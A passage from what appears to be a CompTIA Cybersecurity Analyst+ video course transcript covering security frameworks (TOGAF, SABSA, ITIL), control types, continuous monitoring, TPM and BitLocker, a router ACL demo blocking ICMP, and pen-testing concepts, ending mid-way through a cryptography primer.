ensuring that evidence is kept safe and not tampered with. So the guidelines are for preparing for digital
investigations. It deals with evidence availability and adherence to the chain of custody.
Upon completion of this video, you will be able to recognize how the TOGAF enterprise IT architecture can
increase the efficiency of security controls.
Objectives
recognize how the TOGAF enterprise IT architecture can increase efficiency of security controls
[Topic title: TOGAF. The presenter is Dan Lachance.] There are many different frameworks that can be
adhered to when securing an IT infrastructure. In this video, we'll talk about TOGAF.
TOGAF stands for The Open Group Architecture Framework. This is an enterprise architecture framework that
deals with improving resource efficiency. Now, as a result of that or as a by-product of that, we are improving
upon the return on investment in IT solutions. It also deals with process improvement. This is ongoing. So
periodic monitoring will ensure that business processes are efficient and effective as it relates to the IT systems
that support those processes. So, in the end, TOGAF really deals with improved business productivity.
On the IT efficiencies side, part of that involves application portability so that applications can be run on a
variety of platforms or in a variety of environments. So, for example, part of TOGAF IT efficiencies addresses the
vendor lock-in problem. Now, in the case of public cloud providers, the last thing that we want is to be locked
into a specific cloud provider because we're using a proprietary solution that wouldn't work with a different
provider without a major investment. So this is something that has to be considered in the
case of an enterprise looking, in this particular example, at public cloud solutions. Other IT efficiencies related
to TOGAF include the rapid and cost-efficient procurement of IT solutions. And we have to be careful with
this one because we don't want to sacrifice security at all phases of development of the solution, but it does
relate to things like cloud rapid elasticity. This is one of the pillars of cloud computing – the ability to rapidly
provision IT resources as required and also the rapid ability to deprovision those resources when no longer
needed.
TOGAF also deals with stakeholder concerns where it addresses conflicting concerns. For instance, dealing
with the cost of an effective security control might not be something that an organization is ready to jump on
immediately if not absolutely required. Yet, at the same time – if we're talking about protecting customer
information – well, the customer would be a different type of stakeholder where, of course, it is in their interest
to protect their data. So we could have conflicting concerns that have to be carefully weighed and addressed
so that all parties are kept happy and that we adhere to the required laws or regulations. Also, there needs to be
consistency with how stakeholder concerns are dealt with. Organizational policies will deal with this as well as
business processes.
In the end, it's important that all of our IT solutions support business processes so that we make sure our
solutions have some kind of return on investment over time because they align with business needs. Data
governance is also a part of TOGAF where we have data custodians that are required to take care of data.
Things like dealing with access to data, the backup of data, making sure data is highly available, making sure
that we adhere to laws and regulations as related to certain types of data such as personally identifiable
information or PII that must be kept under strict lock and key and that will vary in different parts of the world
in terms of exactly how that is done.
Data governance also deals with data migration. Now data migration could be reflected when we're looking at
moving to a public cloud solution where data exists currently on-premises. There is also the whole issue of big
data management and data analytics related to big data. With today's large volumes of data, we need effective
solutions to be able to process that data effectively. And usually, how that works out is by using some kind of
large scale distributed processing solution such as a Hadoop cluster.
recognize how to assess risk and apply effective security controls to mitigate that risk
SABSA is another framework. And it stands for Sherwood Applied Business Security Architecture. This
framework deals with security as related to business processes. So it's really an enterprise security architecture
that deals with enterprise service management. And its core driving factor is analyzing risk to assets that have
value to the organization. So SABSA then results in security solutions that support business objectives
directly.
SABSA consists of integrated frameworks. It's really the best of multiple worlds. Some of those integrated
frameworks include TOGAF, The Open Group Architecture Framework, as well as ITIL – the IT Infrastructure
Library – where those frameworks deal with making sure that we have very efficient business processes that
support business requirements and that are also secured with effective security controls. Now SABSA also has
a number of methods for implementation and these are standards based on NIST and ISO publications that are
related to things like business continuity and security service management. There are also legal and regulatory
compliance factors that have to be considered with SABSA and that will vary from one organization to the
next in different parts of the world in different industries.
The SABSA lifecycle begins with the planning phase where business requirements and related risk are
assessed. In the design SABSA phase, we can either look at existing security tools that we deem are effective
in protecting assets or processes or we could develop custom solutions. The idea is that security has to be a part
of all phases. Of course then, once we have designed our solution, we can make sure it gets implemented
properly and then managed and monitored over time. Now monitoring, of course, is an ongoing task to ensure
that business objectives are still met in a secure and efficient manner.
SABSA roles and responsibilities include those such as data custodians. Data custodians may not necessarily
make the rules about how data should be treated, but they must enforce them and make sure that data is
available – for instance, that it is being backed up, that there is a clustering solution for data high availability, or
that data is wiped or sanitized in an acceptable manner and so on. Then there are roles such as service
providers and consumers, which are bound in their activities by the service-level agreement or the SLA. In the
case of a public Cloud provider, for instance, the SLA will guarantee a certain amount of uptime usually
expressed as a percentage on a monthly basis.
Then of course, there is the inventory of assets that have value to the organization. This can be manual or
automated. And then there are network and host layout diagrams for configuration and security controls.
SABSA also deals with things like personnel management at the human resources or HR level. Things like
background checks, responsibilities for employees, and access control lists whereby the principle of least
privilege is followed to ensure that people only have the privileges they need to perform a specific job function.
After completing this video, you will be able to recognize how to apply ITIL to increase the efficiency of IT
service delivery.
Objectives
[Topic title: ITIL. The presenter is Dan Lachance.] In this video, I'll discuss ITIL.
ITIL stands for Information Technology Infrastructure Library. And one of the ideas behind ITIL is to
efficiently deliver IT services that meet business needs. IT service management makes sure – besides aligning
to business needs – that business processes are supported with our IT solutions, that we can quickly adapt to
change and growth, and that we have got the efficient and effective delivery of IT services as required.
Starting with the Service Strategy and Service Design parts of ITIL continual improvement: with design, we
must identify services that need to be provided, define how they'll be provided, and identify the need for them.
Now that also includes planning items such as the cost related to these required services and the way to
efficiently provide these services at a minimized cost. With the Service Transition portion, we're dealing with
things such as patch management for an IT solution as well as new versions of software that must be managed
over time. With Service Operation, we're really talking about configuring our IT solutions to meet business or
customer needs. And also, this is really the continuous life cycle of service improvement over time.
ITIL does not specify specific IT operational "how tos." It also is not a collection of best practices, but it does
provide various solutions to make IT systems secure and efficient. It can also provide a service migration road
map from on-premises solutions to cloud provider solutions.
ITIL includes some recommendations on how to engage appropriate stakeholders whether they would be CIO
– Chief Information Officers – customers, end users within the organization, and so on. But ITIL is designed to
focus on customers and their needs. Of course, ITIL also allows us to mold this framework to our
organization's specific business processes so that we can standardize processes. And, by doing that, we enable
a quicker response to change when change is required. Now ITIL is continual service improvement over the
long term. So like a great investment, you have to be patient. It's designed to show improvement over time, but
it is ongoing and it requires diligent continuous monitoring.
[Topic title: Physical Controls. The presenter is Dan Lachance.] In this video, we'll talk about physical
controls.
Physical controls are right up there alongside user awareness and training as being simple common-sense
security solutions that are often overlooked. We need to think about risk countermeasures as related to physical
controls so that we can protect sensitive data, IT systems, of course physical property, as well as intellectual
property.
Threat scenarios as related to physical security controls include malicious users booting from alternative
media. What we could do to counter that is to set a BIOS password. Then there is the threat of the
retrieval of sensitive data from USB thumb drives or mobile devices – both of which are easy to lose or to have
stolen. So one way to counteract that threat is to encrypt data at rest on these types of devices and also in the
case of mobile devices to enable remote wipe. There is also the threat of network traffic being captured and
analyzed. Well, other than the obvious of encrypting network transmissions physically, we might want to
control access to the network. We might do that using network access control or NAC with centralized
RADIUS authentication. But, at the physical level – if you think about, let's say, a reception area in an office –
any network wall jacks should probably be disabled. We don't want someone coming in with a laptop and
plugging into a wall jack behind a plant and gaining access to the network. The same, of course, applies to
wireless networks.
Then there are physical controls related to physical buildings and facilities or even floors within buildings.
Things like fencing to keep people out, proper lighting, security guards, security cameras, the use of ID badges
for personnel identification – especially after hours and even during work hours – mantraps, which require that
an outer door be closed before a second inner door allows access to a facility. So there are various security
systems, such as alarm and sensor systems, that can be used to physically protect buildings, facilities, and even
floors within buildings.
We should also consider the fact that in the event of a catastrophe, our data needs to be available elsewhere. So
we might have data replication to alternative locations or we might have backup tapes stored offsite. We
should be using door locks to protect sensitive areas of a facility. Certainly, that would include server rooms
and even within a larger data center, the front and back of server room racks should be locked. In the case of
end-user laptops, we could also use lock-down cables so that when a user is working within a certain location,
such as at a customer site, she could use the lock-down cable to secure the laptop around the leg of a piece of
heavy furniture to prevent its theft. There can also be controlled access to floors and rooms. We have probably
all encountered this going into work after hours with a passcard that allows us access to only certain floors in a
building or only certain rooms within a facility. In the case of power outages, there should also be backup
generators so that we can still use our electronic security systems.
To identify logical security controls, consult a security specialist or look for information online.
Objectives
[Topic title: Logical Controls. The presenter is Dan Lachance.] In this video, I'll talk about logical controls.
So we know that physical controls include things like locked doors to server rooms, fencing around a building,
and so on. But what exactly are logical controls? Well, these are often called technical controls. They are
designed to enforce access control to resources such as access to a network or to an IT system or to specific
data within a system. Either way, logical controls must align with organizational security policy and there
needs to be continuous monitoring and evaluation of the effectiveness of these controls in protecting data. And
you will notice that this is a common theme with IT security – continuously monitoring and verifying that our
security solutions properly protect assets.
Authentication is a logical control. And it is the proving of one's identity. There are three types of
authentication categories including something you know like a password, something you have like a smart
card, and something you are such as a unique fingerprint. Multifactor authentication or MFA combines at least
two of these categories. Maybe it would include a smart card and a PIN – something you have and something
you know. Identity Federation is also a part of authentication that is becoming more and more popular these
days. Essentially, with Identity Federation, we have got a trusted central identity store. So, instead of having
multiple copies of user credentials, for example, we have got one central copy that is trusted by multiple
applications. So therefore, there has got to be some configuration, of course, so that various applications trust
the central identity store and also the central identity store has to trust the relying applications. Now the idea is
that Identity Federation is a single set of credentials that allows Web Single Sign-On for web applications.
Authorization occurs after successful authentication. We should be following the principle of least privilege so
that we only assign permissions that are absolutely required and nothing more. This is often done through
access control lists or ACLs at various levels. So we could have an ACL controlling access to various portions
of a web site or within an application. ACLs can control degrees of access to the file system on a server or
access to a network itself through network ACLs, which are often called network packet filtering rules.
Other examples of logical controls include antimalware, hardware tokens used for VPN authentication where
the hardware token is going to have a numeric code that changes periodically that is synchronized with the
VPN appliance. So we have to enter in that unique numeric code within a certain timeframe to successfully
authenticate to the VPN. Password policies are another example of logical controls, as are NTFS file system
permissions.
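The time-synchronized numeric codes mentioned for hardware tokens generally follow the TOTP approach (RFC 6238),
which can be sketched with nothing but the Python standard library. The secret below is a made-up example; a real
token and VPN appliance share a provisioned secret instead.

import base64, hashlib, hmac, struct, time

def totp(secret_base32, period=30, digits=6):
    # Derive the current time-based one-time code from a shared secret.
    key = base64.b32decode(secret_base32, casefold=True)
    counter = int(time.time()) // period                     # both sides compute the same counter
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                               # dynamic truncation (RFC 4226)
    value = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # the token and the VPN appliance derive the same code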
In this video, you will learn how to configure router ACL rules to block ICMP traffic.
Objectives
[Topic title: Configure Router ACL Rules. The presenter is Dan Lachance. The Cisco Packet Tracer Student
window is open. Running along the top of the screen is the menu bar. The menu bar includes the File, Options,
and Help menus. The rest of the screen is divided into two sections. The first section includes The Logical,
New Cluster, and Viewport tabs. By default, the Logical tabbed page is open. The Logical tabbed page
includes a diagram. In the diagram, the PC-PT Client is connected to the 1841 Router1 via the 2950-24
Switch0. The 2950-24 Switch0 is further connected to the Server-PT Local DNS Server. The 1841 Router1 is
connected to the 2950-24 Switch1 via 1841 Internet and 1841 Example routers. The 1841 Internet is further
connected to the Server-PT Root DNS Server. The 2950-24 Switch1 is connected to the Server-PT
server.example.com and Server-PT authority.explains.com.] In this video, I'll demonstrate how to configure a
router ACL rule.
ACL stands for access control list. And, on a router, it essentially either permits or denies traffic into or out of
a specific router interface. So essentially, it's traffic filtering kind of like a packet filtering firewall. In our
diagram, we can see on the left that we have got a client PC that needs to go through a router here called
Router 1 in order to access our HTTP web server over here on the right, which has a DNS name of
server.example.com. So, in our diagram, the first thing we'll do is click on our client PC. [Dan clicks the PC-
PT client and the Client window opens. The Client window includes the Physical, Config, and Desktop tabs.
By default, the Physical tabbed page is open. The Physical tabbed page is divided into two sections. The first
section includes the MODULES and PT-CAMERA options. The second section includes the Zoom In, Original
Size, and Zoom Out tabs.]
Now this is a simulator. So, in the simulator here, I'm going to go to the Desktop tab and click on Command
Prompt. [The Desktop tab includes the Terminal, Command Prompt, Web Browser, and VPN icons. He clicks
the Command Prompt icon and the command prompt opens.] The first thing we're going to do is make sure
that we have got any type of connectivity at all. So I'm going to try to ping our web server by name. I'm going
to type ping server.example.com. So we can see that DNS resolved server.example.com to the IP address of
10.4.0.3. And of course, we have got a number of replies. So we know that ICMP network traffic is working
through Router 1 because we are getting these replies back. What we're going to do in our example is
configure an ACL rule on Router 1 that doesn't allow ICMP traffic, but we still want to be able to connect to
our web server. [He closes the Client window and the Cisco Packet Tracer Student window reappears.]
So, to begin this, if I were to take a look by simply hovering over Router 1 in my diagram, it will pop up and
give me a little bit of details about some of the network interfaces, which I can also click on the router to see as
well. [He clicks the 1841 Router1 and the Router1 window opens. The Router1 window contains the Physical,
Config, and CLI tabs. By default, the Config tabbed page is open. The Config tabbed page includes three
sections. The first section is the navigation pane. The navigation pane includes the GLOBAL, Settings, and
FastEthernet0/0 options. The second section is the content pane. He clicks the FastEthernet0/0 option and its
content is displayed in the content pane. The content pane includes the MAC Address, the Subnet Mask, and Tx
Ring Limit text boxes. The third section includes the Equivalent IOS Commands text box.] For example,
FastEthernet0/0 – we can see that interface here. This is the one that we're going to be using to control traffic
coming in from the PC on the left. Basically, we want to block ICMP traffic. [He closes the Router1 window
and the Cisco Packet Tracer Student window reappears.] So what we're going to do is click right on the router
in the simulator and click the CLI tab. [He clicks the 1841 Router1 and the Router1 window opens.] CLI
stands for command line interface. [The CLI tabbed page includes the IOS Command Line Interface, the Copy
button, and the Paste button.] So now what we're going to do is make sure that we configure an access list to
basically deny ICMP and allow all other IP traffic. To do that, I will type access-list 101 – that's the access list
number – denying ICMP from anywhere to anywhere. [He types the following command in the IOS Command Line
Interface: access-list 101 deny icmp any any.] So I want to block all ICMP. At the same time, I'm going to use
the access list command again – access list 101. But this time I'm going to permit IP traffic – so from anywhere
to anywhere. [He types the following command in the IOS Command Line Interface: access-list 101 permit ip
any any.] So of course, ICMP and IP are completely different protocols.
Next thing I want to do is go into the configuration of the appropriate network interface I want to apply those
rules to. So I'll type interface, now Fast Ethernet or FA0/0 is what I want to connect to. [He types the following
command in the IOS Command Line Interface: interface fa0/0.] So my prompt now changes to show that I'm
configuring that specific interface. Okay, that's great because now I want
to use the ip access-group command, specify the number of my access list – 101 – and tell it that I want to
bind it to this network interface for inbound traffic, so in. [He types the following command in the IOS
Command Line Interface: ip access-group 101 in.] Now, at this point, it should be ready to go. And what that
means is that ICMP traffic should not be allowed, but all other IP traffic should be. Now, in the production
environment, first of all, you would probably be sitting at a station using PuTTY or some other remote tool to
SSH into your router. Secondly, don't turn off ICMP as we have done in this example unless you're absolutely
sure it isn't required by something in your network environment.
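For reference, the full command sequence applied to Router 1 in this demo, gathered in one place, looks like the
following; note that on a real router you would first enter privileged and then global configuration mode (enable,
then configure terminal), steps the narration above doesn't show.

access-list 101 deny icmp any any
access-list 101 permit ip any any
interface fa0/0
ip access-group 101 in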
So let's go ahead and test this. I'm going to click the client PC in our simulator over on the left. [He clicks the
PC-PT Client and the Client window opens.] And I'm going to run a Command Prompt. So first thing I'll do is
try to ping server.example.com once again. However, notice this time that we get a destination host
unreachable where previously we were getting replies. The only thing that's changed here is that our router
ACL doesn't allow ICMP. So that appears to be working. However, do we have any other type of connectivity
through Router 1? [He closes the command prompt.] So, to test that, I'm going to start a web browser on our
PC in our simulator. [He clicks the Web Browser icon and the Web Browser window opens. The Web Browser
window includes the URL text box, the Go button, and the Stop button along the top.] And we're going to see if
we can connect to server.example.com over HTTP because it is our web server. [In the URL, he types
http://server.example.com. Then he clicks the Go button.] And sure enough this sample page popped up where
we can see the blue text with the name of the server. [Below the URL text box, the name of the server is
displayed, which is server.example.com, which is also known as www.example.com.] So we know that we
have still got HTTP traffic, but we don't have ICMP connectivity through Router 1.
In this video, you will learn how to identify administrative security controls.
Objectives
[Topic title: Administrative Controls. The presenter is Dan Lachance.] In this video, we'll discuss
administrative controls.
Administrative security controls are defined by organizational policies and procedures, which could be
influenced by laws and regulations or business contracts. They include things like how to deal with personnel
in a secure manner – which would include things like secure background checks and so on – as well as the
adherence to business practices, ongoing monitoring and improvement.
Administrative controls have a number of categories such as preventative controls. These types of controls
minimize damage by preventing negative incidents or attempting to prevent them in the first place. It would
include things like mantraps controlling access to a physical facility where the outer door must close before an
inner door opens. And this will prevent people from tailgating or piggybacking and coming in behind you without your
knowing. Door locks are considered preventative administrative controls, as is the separation of duties. Now
separation of duties ensures that we don't have one person who can control an entire business process from
beginning to end; we have multiple people involved. However, if those people collude together to
commit fraud, for example, separation of duties alone can't prevent that. Hiring and background checks are definitely
preventive administrative controls related to personnel as is disaster recovery planning and business continuity
planning to ensure that we can get systems and business processes back up and running as quickly and
efficiently as possible in the event of a negative incident.
Detective administrative controls are used to discover negative events after they have
occurred. Things like intrusion detection systems or IDSs – which can detect anomalies and report on them,
but don't stop them – that's where intrusion prevention systems would come in. Rotation of duties within an
organization is considered a detective administrative control because when a new employee fills a position,
they might notice a discrepancy or an anomaly from the previous person that held that role. Same thing is true
with mandatory vacations. Security audits are sometimes required in order for organizations to comply with
requirements for certain types of businesses, but at the same time, security audits can also be used to
identify suspicious activity after it's already occurred. And we can learn from that to harden our environment.
Corrective administrative controls allow us to get things up and running – so for example, restoring a business
process to its original functional state, maybe, after a server that supports that process crashes. Data backups
are corrective administrative controls that we can use to restore data in the event of a problem. Intrusion
prevention systems can also not only detect and report on anomalies, but take steps to prevent them from
continuing. So therefore, they are considered corrective and not just detective administrative controls. The
execution of a disaster recovery plan is also considered a corrective administrative control-related action.
Learn how to identify security controls that compensate for other controls that are not fully effective.
Objectives
[Topic title: Compensating Controls. The presenter is Dan Lachance.] In this video, I'll talk about
compensating controls.
There are many different categories of controls that can be used to secure business processes or assets. Compensating controls are used when more complex or expensive solutions just aren't practical. Now we also might have an inability to comply with specific security requirements due to business or technical constraints such as limits within our budgets or even limits in our internal skill set. Compensating controls
need to address the original intent of the security requirement. And the great news is that we can even use
multiple compensating controls in place of one more complex or expensive solution.
Continuous monitoring ensures that our compensating controls are still effective in protecting business
processes or assets. In some cases, due to legal or regulatory compliance, we might have to use specific
compensating controls. Now, because we have got an ongoing changing business and technical environment,
that requires us to continuously monitor all of our security controls. We can do that using a variety of solutions
including a Security Information and Event Management system or SIEM.
Some examples of compensating controls include a requirement where we have to prevent unwanted network
access. So our compensating control might be to disable unused switch ports. Another requirement might be
segregation of duties as related to a specific business process. Our compensating control might be to use video
surveillance within the facility. Another requirement might be to use multifactor authentication for each
application. However, a compensating control instead might be to use network access control to control
network access in the first place with multifactor authentication. When you look at specific requirements such
as with PCI DSS for organizations that deal with cardholder information for credit and debit cards, they'll list
some compensating controls that might be used in place of other more complex or expensive solutions.
[Topic title: Continuous Monitoring of Controls. The presenter is Dan Lachance.] The implementation of a
security solution does not mark the end of our responsibility as IT security technicians. In this video, we're
going to talk about continuous monitoring of controls.
Information Security Continuous Monitoring or ISCM is just that: continuously monitoring the effectiveness of security controls. It also allows for the timely response to ever-changing threats.
Threat prioritization is also possible for the proper allocation of project teams and resources. So, in the end,
we're evaluating the effectiveness of security controls by constantly monitoring their effectiveness and how
they are used. We might be required to do this for compliance with certain laws and regulations, which in turn
might actually influence the crafting of our organizational security policies. In some cases, it might also dictate
the use of compensating security controls in place of more expensive or more complex solutions.
With continuous monitoring, collected data gets periodically analyzed, which allows for risk management.
Risk management allows us to look at the acceptance of risk by engaging in certain business activities or risk
mitigation by using certain types of security controls, in some cases, even risk transfer – for instance – to a
public cloud provider or to an insurance company. Real-time monitoring is possible with systems including
Security Information and Event Management systems, otherwise called SIEM.
Information sources for continuous monitoring come from a multitude of places including log files, which
could be for network devices, servers, client devices, applications, and so on. We can also take a look at
vulnerability scan results as an information source for continuous monitoring of our controls because this will
point out any vulnerabilities that we need to address. So it'll also lend itself to threat prioritization. Audit
findings are a valuable gold mine of information. For instance, if we're being audited by a third party that
doesn't know anything about our system and has no interest specifically other than conducting an audit, then
we can use that to learn about weaknesses and then make changes to security controls.
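To make the log-file source mentioned above a bit more concrete, here is a minimal Python sketch of the kind of analysis a SIEM automates: counting failed SSH logons per source address. The log path and message format are assumptions and will differ between systems.

    from collections import Counter
    import re

    failures = Counter()
    # Log path and message format are assumptions; they vary by distribution.
    with open("/var/log/auth.log") as log:
        for line in log:
            match = re.search(r"Failed password .* from (\S+)", line)
            if match:
                failures[match.group(1)] += 1

    # Report the top sources of failed logons for analyst follow-up.
    for source, count in failures.most_common(5):
        print(source, count)

A real SIEM would, of course, collect logs from many devices and correlate events, but the underlying idea of continuously reducing raw log data to actionable findings is the same.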
People are also another information source – people that notice suspicious activity whether it's physical or on
the network. And of course, we can take a look at existing business processes to determine if we need to make
changes to further harden our environment.
[Topic title: Hardware Trust. The presenter is Dan Lachance.] In this video, we'll talk about hardware trust.
Firmware is essentially software embedded in a chip. And it's usually for a very specific use unlike an
operating system, which can do millions of things. So therefore, there is often much more trust placed in
hardware or firmware security solutions. One example of this is the Trusted Platform Module or TPM. This is
a firmware standard built in to modern laptops, desktops, and servers. It's part of a chip on the motherboard.
Now TPM can also be built in to the firmware and other devices like set-top boxes, smartphones, and even
tablets. It's part of the NIST-trusted computing requirements in Special Publications 800-147, 155, and 164,
which you could search up in your favorite web browser search engine.
TPM or Trusted Platform Module is firmware that can store cryptographic keys. Now this is used, for instance,
by software – such as Microsoft BitLocker – to store keys that are used for encryption and decryption of
entire disk volumes. However, specific solutions like Microsoft BitLocker can also allow keys to be stored on
USB thumb drives for non-TPM systems. TPM, when it gets initialized at the firmware level, creates what's
called a storage root key or SRK. Application-based keys are then protected by the storage root key. TPM
deals not only with the encryption and decryption of entire disk volumes, but it can also detect changes to the boot environment.
So therefore, it's considered an effective mitigation against bootkit threats or master boot record or MBR rootkits or even the 2011 Mebromi attack. Mebromi is another form of a bootkit attack. Essentially, it can
make changes to BIOS configurations and, in fact, the master boot record. Or you know, there are also some
bootkit threats that can actually flash or wipe the BIOS on a system making it unusable. Now with TPM, when
it gets configured and when it detects a boot-up change, the system will reboot and you will need to enter a
recovery key password to continue because it's considered suspicious activity.
Microsoft BitLocker is disk volume encryption. It doesn't encrypt specific files or folders like Microsoft EFS,
which stands for Encrypting File System. It's not tied to the user and it's designed really to protect data at rest.
So, when a system boots up and a BitLocker encrypted volume is decrypted, it's business as usual and there is no special protection. So it's designed for not only fixed disks, but also removable media where Microsoft BitLocker To Go can be configured to encrypt data, for instance, on a USB thumb drive. It can also be
configured to require a PIN at startup.
[The BitLocker Drive Encryption window opens. It includes the C: BitLocker off drive, the Data (D): BitLocker
off drive, the NEW VOLUME (E:) BitLocker off drive, and the USB (G:) BitLocker off drive.] Here, in the
Windows environment, I have started the BitLocker tool where I can see all of my disks such as C: where it
states that BitLocker is off. [The C: BitLocker off drive includes the Turn on BitLocker link.] Although, I do
have the option of turning on BitLocker for C: as well as my other fixed data drives. Because I have got a USB
thumb drive inserted, I have also got G: – in my case – listed down here where it says BitLocker is off where I
can configure BitLocker To Go. [Dan maximizes the USB (G:) BitLocker off drive. It includes the Turn on
BitLocker link.] And, if I were to click on that drive and then click on the Turn on BitLocker link, it goes
through a wizard that allows me to secure or encrypt the data on that USB thumb drive.
[The BitLocker Drive Encryption (G:) wizard includes the Use a password to unlock the drive checkbox, the
Use my smart card to unlock the drive checkbox, and the Next button.] For BitLocker To Go, I can flag
whether I want to Use a password to unlock the device either on this machine or others and/or the ability to use
a smart card to unlock the drive. [He selects the Use a password to unlock the drive checkbox and the Use my
smart card to unlock the drive checkbox. Then the Group Policy Management Editor window opens. Running
along the top is the menu bar. The menu bar includes the File, Action, and Help menus. The rest of the screen
is divided into two sections. The first section is the navigation pane. It includes the Default Domain Policy
[DC001.QUICK24*7.COM] Policy root node. The Default Domain Policy [DC001.QUICK24*7.COM]
Policy root node contains the Computer Configuration and User Configuration subnodes. By default, the
Default Domain Policy [DC001.QUICK24*7.COM] Policy root node is selected. The second section is the content
pane, and it contains the Extended and Standard tabs at the bottom. By default, the Extended tabbed page is
open. The Extended tabbed page includes the Computer Configuration and User Configuration subnodes.] To
configure the behavior of BitLocker on a larger scale, I might use Group Policy, which I have got open here.
So what I would do then – in the left-hand navigator under Computer Configuration – is open up Policies -
Administrative Templates - Windows Components. [He expands the Policies folder present under the
Computer Configuration subnode. The Policies folder includes the Software Settings and the Administrative
Templates: Policy definition subfolders. He further expands the Administrative Templates: Policy definition
subfolder. The Administrative Templates: Policy definition subfolder includes the Control Panel subfolder, the
Windows Components subfolder, and the System subfolders. He expands the Windows Components subfolder.
The Windows Components subfolder includes the Biometrics, the BitLocker Drive Encryption, and the Edge
UI subfolders. He selects the BitLocker Drive Encryption subfolder. ] Then I would choose BitLocker Drive
Encryption. [The BitLocker Drive Encryption subfolder includes the Fixed Data Drives and the Removable
Data Drives subfolders.] So here I have got options for Fixed Data Drives versus Removable Data Drives as
well as just some general BitLocker Drive Encryption options. [He selects the BitLocker Drive Encryption
subfolder. The Content pane includes the Fixed Data Drives folder and the Prevent memory overwrite on
restart option. He then selects the Prevent memory overwrite on restart option. Then its information is
displayed in the content pane.]
In this video, learn how to identify factors related to conducting penetration tests.
Objectives
identify factors related to conducting penetration tests
[Topic title: Penetration Testing. The presenter is Dan Lachance.] In this video, we'll talk about penetration
testing.
Penetration testing is often referred to simply as a pen test. However, it's not the same as a vulnerability scan.
With the vulnerability scan, we scan a host or a network to identify weaknesses, but none of those weaknesses
get exploited. Well, with the pen test, we are exploiting the weaknesses to see what the reaction is from those
systems. So really, a pen test is testing to discover weaknesses and then exploiting those weaknesses. It can be
applied to a network. A pen test could be for a specific host or even just a specific application as part of the
application life cycle.
There needs to be rules of engagement prior to engaging in penetration testing because we have to think about
the impact or effect on production systems if the pen test is done on live production systems. We don't want a pen tester bringing down a mission-critical component that is required for business without thinking about it first
and getting the proper permission. So we might consider then having a separate testing environment, which
may or may not be virtualized. We also have to think about the duration of the penetration test. Will it be
hours? Will it be days? Will it be weeks?
The key here is to think of these things ahead of time prior to the pen test. Nondisclosure agreements might also need to be signed because a penetration test could potentially uncover very sensitive information that the data owners thought was protected. There also
needs to be a testing schedule that is set ahead of time. Now, in some rare cases, a pen test schedule might not
be known by the network or data owners. And that's part of the point of the pen test as you never really know
when malicious users will strike. However, we might have a testing schedule that is known by all parties that
might take place after hours.
With penetration testing, we can have various teams. A red team, for instance, will be the team that would
attack an IT system, whereas a blue team would defend IT systems. The white team will be used to identify
weaknesses and then report them instead of exploiting them. Now this might be a hybrid of internal IT personnel and an external pen test team. Or it could be done completely externally. Or you might only use
a portion of these types of teams. The idea is that a pen test is a live attack-and-defense exercise where we
would involve multiple teams, should we choose to use them. We can also use tabletop or whiteboard exercises
to step through an attack and the mitigations against it to stop it.
With white-box testing, it is a pen test that gets run with full knowledge of the IT system being tested. Now
grey-box testing is a pen test that's being conducted with only partial knowledge of an IT system. Now that
could mirror, for example, a malicious user that's done some reconnaissance and learned a little bit and
inferred a little bit about how an IT system is configured. Black-box testing is a pen test where there is no
knowledge at all of an IT system. Now, for a hardened environment, reconnaissance might not reveal much of
anything useful to an attacker. So we can look at the various types of tests that we can be conducting against
our networks, hosts, or apps from various perspectives. There is also the aspect of social engineering, which
can also be a part of the pen test. It doesn't all have to be technical tools. Social engineering is tricking people into somehow providing sensitive information they otherwise wouldn't provide. During a pen test, that might take the form of part of the team calling up end users and pretending to be part of the helpdesk to retrieve sensitive information.
Exercise Overview
[Topic title: Exercise: Mitigations and Security Control types. The presenter is Dan Lachance.] In this
exercise, you'll begin by identifying characteristics of host hardening followed by describing the purpose of a
honeypot, identifying standards bodies that provide IT security guidance, you will contrast physical, logical,
and administrative controls, and finally you will discuss the purpose of penetration testing. At this time, pause
the video and perform each of these exercises and come back to view the answers.
Solution
Host hardening includes many aspects such as firmware patches being applied either to expansion cards or to
the BIOS on the motherboard. Software patches, changing default configurations, the use of complex
passwords, and removing unneeded services also fall under host hardening.
A honeypot is a system that's intentionally left vulnerable. The purpose is so that we can track malicious
activity. However, care must be taken when using honeypots so that the honeypot doesn't get compromised by
malicious users and is then used to attack others. There is also the unintentional data leakage that we have to
consider.
Standards bodies that provide IT security guidance include the National Institute of Standards and Technology
or NIST, the International Organization for Standardization or ISO, and also the Open Web Application
Security Project or OWASP, which focuses specifically on web application security.
Physical security control types include things such as video surveillance and mantraps, whereas logical
security control types include examples such as network ACLs and multifactor authentication. Administrative
security control types include things such as background checks for employees as well as mandatory vacations
to point out anomalies.
Penetration testing is a type of test that's used to discover weaknesses. But, not only discover, also exploit
weaknesses. We can apply penetration testing to an entire network, to a specific host, or even down to a
specific application.
CompTIA Cybersecurity Analyst+: Protecting Network Resources
Authentication controls who gets access to resources. Stronger authentication means greater control over
resource access. Discover network protection techniques, including cryptography, biometrics, hashing, and
authentication.
Table of Contents
Objectives
[Topic title: Cryptography Primer. The presenter is Dan Lachance.] In this video, I'll talk about cryptography.
Cryptography protects digital data. It provides confidentiality, integrity, and authentication. Cryptanalysis, on
the other hand, is the close scrutiny of a cryptosystem to identify weaknesses within it. Encryption and
decryption of data is essentially data scrambling to prevent access to data from unauthorized users.
Authentication is used to verify the authenticity of origin of data. In other words, in the case of e-mail perhaps,
we have a digitally signed message that we can verify – really it did come from who it says it came from. So
the sender cannot refute the fact that it was sent. And this is called nonrepudiation. Now this is because the
sender would have possession of a private key. And only that private key is used to create a digital signature.
And no one else would have that private key. Hashing is used to verify data integrity. If a change is made to
data when we compute a hash, it will not match an original hash taken prior. So we know that something has changed.
In cryptography, there are some terms that we have to get to know very well, one of which is plain text. This is
data that hasn't yet been encrypted. Ciphertext is encrypted plain text. So it's the result of feeding plain text to
an algorithm with a key. Encryption and decryption might require a single key, a symmetric key, or two keys
that are mathematically related – a public and private key pair – depending on the algorithm being used.
Ciphertext gets derived by taking plain text – seen here as Hello World! – combining it with a key, which we
see on the screen, [The key displayed on the screen is Q#$TAH$kskk3g2-.] and feeding that into an algorithm.
The result on the other end of the algorithm is our encrypted ciphertext. [The ciphertext is Gh%*_+!3BAL3.]
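As a rough sketch of that same flow in code – plain text plus a key going into an algorithm and ciphertext coming out – the following Python example uses the third-party cryptography package. The package choice is an assumption; the course itself doesn't prescribe a library.

    from cryptography.fernet import Fernet

    key = Fernet.generate_key()        # the secret key
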